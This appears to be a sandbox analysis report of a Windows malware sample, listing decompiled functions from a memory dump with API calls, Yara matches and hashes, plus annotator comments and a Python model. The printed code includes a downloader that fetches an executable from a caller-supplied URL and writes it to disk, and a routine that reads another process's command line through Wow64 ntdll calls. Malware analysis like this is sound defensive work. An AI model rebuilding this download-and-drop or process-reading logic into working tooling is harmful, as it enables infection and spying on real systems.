                                                                                    						return E04ED572E(_v68 ^ _t150, _v56);
                                                                                    					} else {
                                                                                    						if(CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t106) == 0) {
                                                                                    							L7:
                                                                                    							_t85 = GetLastError();
                                                                                    						} else {
                                                                                    							_t85 = E04ECD1A0( *((intOrPtr*)(_v24 + 0x40)),  *(_t140 + 0x88), _v28, _t115);
                                                                                    						}
                                                                                    						L15:
                                                                                    						_t121 = 1;
                                                                                    						L16:
                                                                                    						_v20 = _t85;
                                                                                    						if(_t85 != 0 && _t121 != 0) {
                                                                                    							E04ED2560(_v24, _t140, 0, 0, 0);
                                                                                    							_t89 = E04ECC570(_v24 + 0xb0, _t115);
                                                                                    							if(_t89 == 0) {
                                                                                    								HeapFree( *( *(_t115 + 0x14)), _t89, _t115);
                                                                                    							}
                                                                                    						}
                                                                                    						LeaveCriticalSection(_t144);
                                                                                    						return E04ED572E(_v8 ^ _t149);
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x04ed3cc6
                                                                                    0x04ed3ccd
                                                                                    0x04ed3cd3
                                                                                    0x04ed3cd4
                                                                                    0x04ed3cd5
                                                                                    0x04ed3cdb
                                                                                    0x04ed3cdc
                                                                                    0x04ed3cde
                                                                                    0x04ed3ce4
                                                                                    0x04ed3cf1
                                                                                    0x04ed3cf4
                                                                                    0x04ed3cfb
                                                                                    0x04ed3d00
                                                                                    0x04ed3d02
                                                                                    0x04ed3d35
                                                                                    0x04ed3d04
                                                                                    0x04ed3d04
                                                                                    0x04ed3d1c
                                                                                    0x04ed3d24
                                                                                    0x04ed3d27
                                                                                    0x04ed3d2a
                                                                                    0x04ed3d2d
                                                                                    0x04ed3d30
                                                                                    0x04ed3d30
                                                                                    0x04ed3d38
                                                                                    0x04ed3d3b
                                                                                    0x04ed3d40
                                                                                    0x04ed3d43
                                                                                    0x04ed3d46
                                                                                    0x04ed3d4d
                                                                                    0x04ed3d57
                                                                                    0x04ed3d5f
                                                                                    0x04ed3d61
                                                                                    0x04ed3d61
                                                                                    0x04ed3d65
                                                                                    0x04ed3d6b
                                                                                    0x04ed3d72
                                                                                    0x04ed3d79
                                                                                    0x04ed3d85
                                                                                    0x04ed3deb
                                                                                    0x04ed3df8
                                                                                    0x04ed3dfc
                                                                                    0x04ed3e07
                                                                                    0x04ed3e0d
                                                                                    0x04ed3e10
                                                                                    0x04ed3e83
                                                                                    0x00000000
                                                                                    0x04ed3e12
                                                                                    0x04ed3e12
                                                                                    0x04ed3e15
                                                                                    0x04ed3e28
                                                                                    0x04ed3e2e
                                                                                    0x04ed3e30
                                                                                    0x00000000
                                                                                    0x04ed3e36
                                                                                    0x04ed3e44
                                                                                    0x04ed3e4a
                                                                                    0x04ed3e4c
                                                                                    0x00000000
                                                                                    0x04ed3e4e
                                                                                    0x04ed3e52
                                                                                    0x04ed3e59
                                                                                    0x04ed3e5e
                                                                                    0x04ed3e61
                                                                                    0x04ed3e71
                                                                                    0x04ed3e77
                                                                                    0x04ed3e7e
                                                                                    0x00000000
                                                                                    0x04ed3e63
                                                                                    0x04ed3e68
                                                                                    0x04ed3e6d
                                                                                    0x04ed3e6d
                                                                                    0x04ed3e61
                                                                                    0x00000000
                                                                                    0x04ed3e4c
                                                                                    0x04ed3e30
                                                                                    0x04ed3d87
                                                                                    0x04ed3d87
                                                                                    0x04ed3d8a
                                                                                    0x04ed3d9d
                                                                                    0x04ed3da5
                                                                                    0x04ed3ee4
                                                                                    0x04ed3ee9
                                                                                    0x04ed3eee
                                                                                    0x04ed3ef3
                                                                                    0x04ed3ef8
                                                                                    0x04ed3ef9
                                                                                    0x04ed3efa
                                                                                    0x04ed3efb
                                                                                    0x04ed3efc
                                                                                    0x04ed3efd
                                                                                    0x04ed3efe
                                                                                    0x04ed3eff
                                                                                    0x04ed3f01
                                                                                    0x04ed3f06
                                                                                    0x04ed3f0d
                                                                                    0x04ed3f10
                                                                                    0x04ed3f13
                                                                                    0x04ed3f19
                                                                                    0x04ed3f1c
                                                                                    0x04ed3f24
                                                                                    0x04ed3f2a
                                                                                    0x04ed3f33
                                                                                    0x04ed3f39
                                                                                    0x04ed3f44
                                                                                    0x04ed3dab
                                                                                    0x04ed3dc1
                                                                                    0x04ed3de0
                                                                                    0x04ed3de0
                                                                                    0x04ed3dc3
                                                                                    0x04ed3dd3
                                                                                    0x04ed3dd8
                                                                                    0x04ed3e89
                                                                                    0x04ed3e89
                                                                                    0x04ed3e8e
                                                                                    0x04ed3e8e
                                                                                    0x04ed3e93
                                                                                    0x04ed3ea5
                                                                                    0x04ed3eb1
                                                                                    0x04ed3eb8
                                                                                    0x04ed3ec1
                                                                                    0x04ed3ec1
                                                                                    0x04ed3eb8
                                                                                    0x04ed3ec8
                                                                                    0x04ed3ee1
                                                                                    0x04ed3ee1
                                                                                    0x04ed3da5

                                                                                    APIs
                                                                                    • HeapAlloc.KERNEL32(?,00000000,?,?,?,?), ref: 04ED3D16
                                                                                    • EnterCriticalSection.KERNEL32(00000054,?,00000000,?,?,?), ref: 04ED3D65
                                                                                    • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 04ED3D9D
                                                                                    • CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000), ref: 04ED3DB9
                                                                                    • GetLastError.KERNEL32 ref: 04ED3DE0
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    • HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04ED3EC1
                                                                                    • LeaveCriticalSection.KERNEL32(00000054), ref: 04ED3EC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterErrorHeapLastLeave$AllocCompletionCreateExceptionFreePortRaiseioctlsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1309912178-0
                                                                                    • Opcode ID: 3f0d6f417f57c8925e4b1da09b45d384b6aea54bd33b5e577358cfe478af62cb
                                                                                    • Instruction ID: 0927e0a0c9a223ed4b7d1c4a6817d8d5e082bb873b5a2dacfaf72d2c9fab427d
                                                                                    • Opcode Fuzzy Hash: 3f0d6f417f57c8925e4b1da09b45d384b6aea54bd33b5e577358cfe478af62cb
                                                                                    • Instruction Fuzzy Hash: A6714A71A00209AFDB04DFA5C884BAEBBB9FF88305F104159ED15E7250EB71B955CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 36%
                                                                                    			E04EB5DA0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v32;
                                                                                    				intOrPtr _v72;
                                                                                    				intOrPtr _v76;
                                                                                    				char _v84;
                                                                                    				intOrPtr _v976;
                                                                                    				intOrPtr _v980;
                                                                                    				signed int _v988;
                                                                                    				char _v1100;
                                                                                    				intOrPtr _v1968;
                                                                                    				intOrPtr _v1972;
                                                                                    				char _v2004;
                                                                                    				intOrPtr _v2008;
                                                                                    				char _v2012;
                                                                                    				intOrPtr _v2016;
                                                                                    				signed int _t58;
                                                                                    				struct HINSTANCE__* _t60;
                                                                                    				struct HINSTANCE__* _t62;
                                                                                    				signed int _t83;
                                                                                    				intOrPtr* _t107;
                                                                                    				intOrPtr _t127;
                                                                                    				intOrPtr* _t129;
                                                                                    				intOrPtr* _t131;
                                                                                    				intOrPtr _t132;
                                                                                    				void* _t133;
                                                                                    				signed int _t134;
                                                                                    				intOrPtr _t154;
                                                                                    
                                                                                    				_t58 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t58 ^ _t134;
                                                                                    				_v2016 = __edx;
                                                                                    				_t129 = __ecx;
                                                                                    				_t60 = GetModuleHandleA("ntdll.dll");
                                                                                    				if(_t60 != 0) {
                                                                                    					L3:
                                                                                    					_t131 = GetProcAddress(_t60, "NtWow64QueryInformationProcess64");
                                                                                    				} else {
                                                                                    					_t60 = LoadLibraryA("ntdll.dll");
                                                                                    					if(_t60 != 0) {
                                                                                    						goto L3;
                                                                                    					} else {
                                                                                    						_t131 = 0;
                                                                                    					}
                                                                                    				}
                                                                                    				_t62 = GetModuleHandleA("ntdll.dll");
                                                                                    				if(_t62 != 0) {
                                                                                    					L7:
                                                                                    					_t107 = GetProcAddress(_t62, "NtWow64ReadVirtualMemory64");
                                                                                    				} else {
                                                                                    					_t62 = LoadLibraryA("ntdll.dll");
                                                                                    					if(_t62 != 0) {
                                                                                    						goto L7;
                                                                                    					} else {
                                                                                    						_t107 = 0;
                                                                                    					}
                                                                                    				}
                                                                                    				if(_t131 == 0 || _t107 == 0) {
                                                                                    					// Either export missing: reset the output std::wstring at _t129 (MSVC layout: size at +0x10,
                                                                                    					// capacity at +0x14, 7 = in-place capacity for wchar_t) and assign it the wide-string
                                                                                    					// constant at 0x4efb5d0, the same value every failure path below returns.
                                                                                    					 *((intOrPtr*)(_t129 + 0x14)) = 7;
                                                                                    					 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                    					 *_t129 = 0;
                                                                                    					E04EB32A0(_t129, 0x4efb5d0);
                                                                                    					__eflags = _v8 ^ _t134;
                                                                                    					return E04ED572E(_v8 ^ _t134, 0);
                                                                                    				} else {
                                                                                    					E04EDDAD0(_t129,  &_v84, 0, 0x30); // memset(&pbi, 0, 0x30): PROCESS_BASIC_INFORMATION64 is 0x30 bytes
                                                                                    					asm("xorps xmm0, xmm0");
                                                                                    					asm("movlpd [ebp-0x7d8], xmm0"); // zero _v2008, the high dword of the 64-bit byte count the Nt calls report through &_v2012
                                                                                    					// NtWow64QueryInformationProcess64(hProcess, ProcessBasicInformation (0), &pbi, 0x30, &returned)
                                                                                    					_push( &_v2012);
                                                                                    					_push(0x30);
                                                                                    					_push( &_v84);
                                                                                    					_push(0);
                                                                                    					_push(_v2016); // handle to the 64-bit target process, passed in edx
                                                                                    					if( *_t131() < 0 || _v2012 != 0x30 || _v2008 != 0) {
                                                                                    						L24:
                                                                                    						// Any failed query or short read: return the constant at 0x4efb5d0
                                                                                    						E04EB31B0(_t129, _t129, 0x4efb5d0);
                                                                                    						__eflags = _v8 ^ _t134;
                                                                                    						return E04ED572E(_v8 ^ _t134);
                                                                                    					} else {
                                                                                    						_t132 = _v2016;
                                                                                    						// NtWow64ReadVirtualMemory64(hProcess, pbi.PebBaseAddress, &peb, 0x388, &returned):
                                                                                    						// _v76:_v72 is the 64-bit PebBaseAddress at PBI64+8; the first 0x388 bytes of the
                                                                                    						// target's 64-bit PEB are copied into _v2004. The read must return exactly 0x388 bytes.
                                                                                    						_push( &_v2012);
                                                                                    						_push(0);
                                                                                    						_push(0x388);
                                                                                    						_push( &_v2004);
                                                                                    						_push(_v72);
                                                                                    						_push(_v76);
                                                                                    						_push(_t132);
                                                                                    						if( *_t107() < 0 || _v2012 != 0x388 || _v2008 != 0) {
                                                                                    							goto L24;
                                                                                    						} else {
                                                                                    							// Second read: PEB64+0x20 (_v1972:_v1968) is the 64-bit ProcessParameters pointer;
                                                                                    							// 0x3f8 bytes of RTL_USER_PROCESS_PARAMETERS64 are copied into _v1100.
                                                                                    							_push( &_v2012);
                                                                                    							_push(0);
                                                                                    							_push(0x3f8);
                                                                                    							_push( &_v1100);
                                                                                    							_push(_v1968);
                                                                                    							_push(_v1972);
                                                                                    							_push(_t132);
                                                                                    							if( *_t107() < 0 || _v2012 != 0x3f8) {
                                                                                    								goto L24;
                                                                                    							} else {
                                                                                    								_t154 = _v2008;
                                                                                    								if(_t154 != 0) {
                                                                                    									goto L24;
                                                                                    								} else {
                                                                                    									// RTL_USER_PROCESS_PARAMETERS64+0x70 is the CommandLine UNICODE_STRING: Length (USHORT)
                                                                                    									// is _v988, the 64-bit Buffer pointer is _v980:_v976. The sample allocates (Length + 1) * 2
                                                                                    									// bytes with E04ED5785 (most likely operator new; the ~(_t154 > 0) | ... expression is the
                                                                                    									// decompiler's rendering of the compiler's overflow-saturated size), zero-fills the buffer
                                                                                    									// and reads Length bytes of the UTF-16 command line out of the 64-bit target.
                                                                                    									_t83 = (_v988 & 0x0000ffff) + 1;
                                                                                    									_t133 = E04ED5785( ~(_t154 > 0) | _t83 * 0x00000002, _t132, _t154);
                                                                                    									E04EDDAD0(_t129, _t133, 0, 2 + (_v988 & 0x0000ffff) * 2);
                                                                                    									asm("cdq");
                                                                                    									 *_t107(_v2016, _v980, _v976, _t133, _v988 & 0x0000ffff, _t83 * 2 >> 0x20,  &_v2012,  ~(_t154 > 0) | _t83 * 0x00000002);
                                                                                    									// Build a temporary std::wstring (_v32, size _v16, capacity _v12) from the buffer, free the
                                                                                    									// buffer, then move the temporary into the caller's string at _t129: with capacity >= 8 the
                                                                                    									// heap pointer is stolen, otherwise the short string is copied in place.
                                                                                    									E04EB31B0( &_v32, _t129, _t133);
                                                                                    									E04ED573F(_t133);
                                                                                    									 *((intOrPtr*)(_t129 + 0x14)) = 7;
                                                                                    									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                    									 *_t129 = 0;
                                                                                    									_t127 = _v12;
                                                                                    									if(_t127 >= 8) {
                                                                                    										 *_t129 = _v32;
                                                                                    										_v32 = 0;
                                                                                    									} else {
                                                                                    										_t101 = _v16 + 1;
                                                                                    										if(_v16 + 1 != 0) {
                                                                                    											E04EDCC90(_t129,  &_v32, _t101 + _t101);
                                                                                    											_t127 = _v12;
                                                                                    										}
                                                                                    									}
                                                                                    									 *((intOrPtr*)(_t129 + 0x10)) = _v16;
                                                                                    									 *((intOrPtr*)(_t129 + 0x14)) = _t127;
                                                                                    									_v12 = 7;
                                                                                    									_v16 = 0;
                                                                                    									_v32 = 0;
                                                                                    									E04EB3170( &_v32); // destroy the now-empty temporary
                                                                                    									return E04ED572E(_v8 ^ _t134);
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    (Instruction addresses for the statements of this function run from 0x04eb5da9 to 0x04eb6051.)

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB5DC3
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB5DD8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04EB5DE8
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB5DF5
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB5E04
                                                                                    • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04EB5E14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                    • String ID: 0$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$ntdll.dll
                                                                                    • API String ID: 310444273-3583746680
                                                                                    • Opcode ID: f283abb9b93ebe0642563a06a3b8e0b033e1db7ba797f535df5fa1ae1c0a14ba
                                                                                    • Instruction ID: 73f9c3fd9fb9aa4f16dfd412477f99cb9e6160366b184e3ce64e09881f3d627d
                                                                                    • Opcode Fuzzy Hash: f283abb9b93ebe0642563a06a3b8e0b033e1db7ba797f535df5fa1ae1c0a14ba
                                                                                    • Instruction Fuzzy Hash: F3618371E0021AABEF649F61DC41BFFB7B9EF44308F5011A6E909A6140DB78BA44CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
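The function above is a WOW64 (32-bit) process reading the command line of a 64-bit process. It cannot use ReadProcessMemory for that, because in a 32-bit process that API only takes 32-bit addresses and the 64-bit PEB normally lives above 4 GiB, so it walks PROCESS_BASIC_INFORMATION64.PebBaseAddress, PEB64.ProcessParameters and RTL_USER_PROCESS_PARAMETERS64.CommandLine through the two Wow64 ntdll exports. The Python model below is added here and is not code from the report or from the sample: it reproduces that walk against a constructed in-memory target so the offsets in the decompile (_v76:_v72 = PBI64+8, _v1972:_v1968 = PEB64+0x20, _v988 and _v980:_v976 = parameters+0x70 and +0x78) can be checked offline. The structure offsets are the public 64-bit layouts, the read sizes are the ones the sample requests; the function names, the address values and the in-memory target are assumptions, and the two callables would wrap the real ntdll exports (via ctypes) on a Windows host.

```python
import struct

# Offsets from the public 64-bit Windows layouts (PROCESS_BASIC_INFORMATION64,
# PEB64, RTL_USER_PROCESS_PARAMETERS64, UNICODE_STRING64); sizes are what the
# decompiled function asks the Nt calls for.
PBI64_SIZE = 0x30               # NtWow64QueryInformationProcess64 must return exactly this much
PBI64_PEB_BASE = 0x08           # ULONG64 PebBaseAddress (_v76:_v72 in the decompile)
PEB64_READ_SIZE = 0x388         # bytes of the 64-bit PEB the sample copies
PEB64_PROCESS_PARAMS = 0x20     # ULONG64 ProcessParameters (_v1972:_v1968)
RUPP64_READ_SIZE = 0x3f8        # bytes of RTL_USER_PROCESS_PARAMETERS64 the sample copies
RUPP64_COMMAND_LINE = 0x70      # UNICODE_STRING64 CommandLine: Length, MaximumLength, pad, Buffer


def command_line_of_wow64_target(query_pbi, read_mem):
    """Walk PBI64 -> PEB64 -> ProcessParameters -> CommandLine the way the sample does.

    query_pbi() returns the PROCESS_BASIC_INFORMATION64 bytes or None.
    read_mem(address, size) returns exactly `size` bytes or None; a short read is a
    failure, mirroring the sample's "bytes returned != requested" checks.
    (Assumed wrappers; on Windows they would call the two ntdll exports via ctypes.)
    """
    pbi = query_pbi()
    if pbi is None or len(pbi) != PBI64_SIZE:
        return None
    (peb_base,) = struct.unpack_from("<Q", pbi, PBI64_PEB_BASE)

    peb = read_mem(peb_base, PEB64_READ_SIZE)
    if peb is None:
        return None
    (params,) = struct.unpack_from("<Q", peb, PEB64_PROCESS_PARAMS)

    rupp = read_mem(params, RUPP64_READ_SIZE)
    if rupp is None:
        return None
    length, _max_length, _pad, buffer = struct.unpack_from("<HHIQ", rupp, RUPP64_COMMAND_LINE)

    # The sample allocates (Length + 1) * 2 zeroed bytes and reads Length bytes of UTF-16.
    raw = read_mem(buffer, length)
    if raw is None:
        return None
    return raw.decode("utf-16-le")


class ConstructedTarget:
    """Fake 64-bit address space, {base_address: bytes}. Constructed test data only."""

    def __init__(self, regions):
        self.regions = regions

    def read(self, address, size):
        for base, data in self.regions.items():
            if base <= address and address + size <= base + len(data):
                return data[address - base:address - base + size]
        return None  # outside every region: NtWow64ReadVirtualMemory64 would fail


def build_constructed_target(cmdline):
    """Lay out PBI64, PEB64, RTL_USER_PROCESS_PARAMETERS64 and the command line above 4 GiB."""
    cmd = cmdline.encode("utf-16-le")
    peb_addr, params_addr, cmd_addr = 0x000000E5F2A00000, 0x0000021122330000, 0x0000021122334000  # assumed

    pbi = bytearray(PBI64_SIZE)
    struct.pack_into("<Q", pbi, PBI64_PEB_BASE, peb_addr)
    peb = bytearray(PEB64_READ_SIZE)
    struct.pack_into("<Q", peb, PEB64_PROCESS_PARAMS, params_addr)
    rupp = bytearray(RUPP64_READ_SIZE)
    struct.pack_into("<HHIQ", rupp, RUPP64_COMMAND_LINE, len(cmd), len(cmd) + 2, 0, cmd_addr)

    target = ConstructedTarget({peb_addr: bytes(peb), params_addr: bytes(rupp), cmd_addr: cmd})
    return bytes(pbi), target


if __name__ == "__main__":
    pbi, target = build_constructed_target('"C:\\Windows\\explorer.exe"')
    print(command_line_of_wow64_target(lambda: pbi, target.read))
```

Every pointer in the constructed target is above 4 GiB on purpose: that is the case the Wow64 helpers exist for, and the reason the sample falls back to the string constant at 0x4efb5d0 when the helpers are absent rather than trying ReadProcessMemory.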

                                                                                    C-Code - Quality: 93%
                                                                                    			E04EC5710(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				void _v1032;
                                                                                    				char _v1033;
                                                                                    				long _v1040;
                                                                                    				WCHAR* _v1044;
                                                                                    				long _v1048;
                                                                                    				void* _v1052;
                                                                                    				signed int _t21;
                                                                                    				void* _t45;
                                                                                    				void* _t53;
                                                                                    				void* _t54;
                                                                                    				struct _OVERLAPPED* _t56;
                                                                                    				signed int _t58;
                                                                                    				void* _t59;
                                                                                    
                                                                                    				_t21 =  *0x4f03008; // 0x3d21fb31: /GS stack cookie
                                                                                    				_v8 = _t21 ^ _t58;
                                                                                    				_v1044 = __edx;  // destination file path (edx); the URL arrives in ecx
                                                                                    				_v1040 = 0;      // bytes read by InternetReadFile
                                                                                    				_t56 = 1;        // "first chunk" flag for the MZ check below
                                                                                    				_v1048 = 0;      // bytes written by WriteFile
                                                                                    				_v1033 = 1;      // success flag, cleared when the first chunk is not a PE
                                                                                    				_t53 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0); // fixed User-Agent (access type 0 = INTERNET_OPEN_TYPE_PRECONFIG): a network indicator
                                                                                    				_v1052 = _t53;
                                                                                    				if(_t53 == 0) {
                                                                                    					L3:
                                                                                    					return E04ED572E(_v8 ^ _t58);
                                                                                    				} else {
                                                                                    					_t45 = InternetOpenUrlW(_t53, __ecx, 0, 0, 0x80000000, 0); // 0x80000000 = INTERNET_FLAG_RELOAD: bypass the cache
                                                                                    					if(_t45 != 0) {
                                                                                    						_t54 = CreateFileW(_v1044, 0x40000000, 0, 0, 2, 0, 0); // GENERIC_WRITE, CREATE_ALWAYS: the file exists before any data is read
                                                                                    						if(_t54 != 0xffffffff) {
                                                                                    							while(1) {
                                                                                    								E04EDDAD0(_t54,  &_v1032, 0, 0x400); // memset(buf, 0, 1024)
                                                                                    								_t59 = _t59 + 0xc;
                                                                                    								InternetReadFile(_t45,  &_v1032, 0x400,  &_v1040);
                                                                                    								// Only the first 1 KiB chunk is inspected, and only its first WORD: 0x5a4d is "MZ".
                                                                                    								// A non-PE or empty response (the buffer was zeroed) breaks out before anything is
                                                                                    								// written, leaving a zero-byte file at the destination path.
                                                                                    								if(_t56 != 0 && _v1032 != 0x5a4d) {
                                                                                    									break;
                                                                                    								}
                                                                                    								_t56 = 0;
                                                                                    								WriteFile(_t54,  &_v1032, _v1040,  &_v1048, 0);
                                                                                    								if(_v1040 > 0) { // loop until InternetReadFile reports 0 bytes
                                                                                    									continue;
                                                                                    								} else {
                                                                                    								}
                                                                                    								L10:
                                                                                    								CloseHandle(_t54);
                                                                                    								goto L11;
                                                                                    							}
                                                                                    							_v1033 = 0; // MZ check failed: report failure
                                                                                    							goto L10;
                                                                                    						}
                                                                                    						L11:
                                                                                    						InternetCloseHandle(_t45);
                                                                                    						InternetCloseHandle(_v1052);
                                                                                    						return E04ED572E(_v8 ^ _t58);
                                                                                    					} else {
                                                                                    						InternetCloseHandle(_t53);
                                                                                    						goto L3;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 04EC575B
                                                                                    • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 04EC577A
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 04EC5787
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04EC57B5
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04EC57EC
                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 04EC581C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC5834
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 04EC5841
                                                                                    • InternetCloseHandle.WININET(?), ref: 04EC5849
                                                                                    Strings
                                                                                    • Mozilla/4.0 (compatible), xrefs: 04EC572E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandle$File$Open$CreateReadWrite
                                                                                    • String ID: Mozilla/4.0 (compatible)
                                                                                    • API String ID: 769820311-4055971283
                                                                                    • Opcode ID: bfe12017a83d1b562a5443655cf0667efb6c5bd3b517932df06b07a83deb3f21
                                                                                    • Instruction ID: 61a1c22e62f0fd9adafe2e518a65013c1fa794fd9c5a6be339669485659620d4
                                                                                    • Opcode Fuzzy Hash: bfe12017a83d1b562a5443655cf0667efb6c5bd3b517932df06b07a83deb3f21
                                                                                    • Instruction Fuzzy Hash: 1931C8B1A40228BBEB309B54DC45FAEB778DB84B05F1041E9FB09B61C0D6747D868F98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 54%
                                                                                    			E04EB6520() {
                                                                                    				struct HINSTANCE__* _t1;
                                                                                    				_Unknown_base(*)()* _t2;
                                                                                    				struct HINSTANCE__* _t3;
                                                                                    				_Unknown_base(*)()* _t6;
                                                                                    				struct HINSTANCE__* _t15;
                                                                                    
                                                                                    				_t1 = LoadLibraryA("User32.dll");
                                                                                    				_t15 = _t1;
                                                                                    				if(_t15 != 0) {
                                                                                    					_t2 = GetProcAddress(_t15, "SetProcessDpiAwarenessContext");
                                                                                    					if(_t2 == 0) {
                                                                                    						L4:
                                                                                    						_t3 = LoadLibraryA("Shcore.dll");
                                                                                    						if(_t3 == 0) {
                                                                                    							L8:
                                                                                    							if(GetProcAddress(_t15, "SetProcessDPIAware") != 0) {
                                                                                    								goto __eax;
                                                                                    							}
                                                                                    							return 0;
                                                                                    						} else {
                                                                                    							_t6 = GetProcAddress(_t3, "SetProcessDpiAwareness");
                                                                                    							if(_t6 == 0) {
                                                                                    								goto L8;
                                                                                    							} else {
                                                                                    								_push(2);
                                                                                    								if( *_t6() == 0) {
                                                                                    									goto L8;
                                                                                    								} else {
                                                                                    									goto L7;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						_push(0xfffffffd);
                                                                                    						if( *_t2() != 0) {
                                                                                    							L7:
                                                                                    							return 1;
                                                                                    						} else {
                                                                                    							goto L4;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					return _t1;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(User32.dll,?,04EB65D3), ref: 04EB6526
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 04EB6541
                                                                                    • LoadLibraryA.KERNEL32(Shcore.dll,?,?,04EB65D3), ref: 04EB6554
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 04EB6564
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: SetProcessDPIAware$SetProcessDpiAwareness$SetProcessDpiAwarenessContext$Shcore.dll$User32.dll
                                                                                    • API String ID: 2574300362-2252252969
                                                                                    • Opcode ID: 22f2c17acdf8fd9ef5998d8bb2840c0761e986bf74c3117eb1510f5024c42468
                                                                                    • Instruction ID: c9a9b0e2fd373ccb3a786e28e459d2264b3dd08b1f17d235c58062216f6a42bf
                                                                                    • Opcode Fuzzy Hash: 22f2c17acdf8fd9ef5998d8bb2840c0761e986bf74c3117eb1510f5024c42468
                                                                                    • Instruction Fuzzy Hash: 41F02B33B42617125B21A17E3C00FFB17487FD0A693259621F996D508CDE40F65244F2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E04ED1A20(intOrPtr __ecx) {
                                                                                    				intOrPtr _v8;
                                                                                    				long _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				void* __esi;
                                                                                    				void* _t44;
                                                                                    				long _t45;
                                                                                    				short* _t51;
                                                                                    				void* _t54;
                                                                                    				signed int _t57;
                                                                                    				intOrPtr _t63;
                                                                                    				intOrPtr _t69;
                                                                                    				signed int _t70;
                                                                                    				signed int _t71;
                                                                                    				intOrPtr _t80;
                                                                                    				signed int _t82;
                                                                                    				struct _CRITICAL_SECTION* _t93;
                                                                                    
                                                                                    				_t63 = __ecx;
                                                                                    				_v16 = __ecx;
                                                                                    				if( *((intOrPtr*)(__ecx + 0x24)) != 0) {
                                                                                    					_t93 = __ecx + 0x28;
                                                                                    					EnterCriticalSection(_t93);
                                                                                    					__eflags =  *(_t63 + 0x24);
                                                                                    					if( *(_t63 + 0x24) != 0) {
                                                                                    						_t82 = timeGetTime();
                                                                                    						_v12 = _t82;
                                                                                    						_v8 =  *((intOrPtr*)(_t63 + 0x18));
                                                                                    						__eflags = _t82;
                                                                                    						if(_t82 == 0) {
                                                                                    							_v12 = timeGetTime();
                                                                                    						}
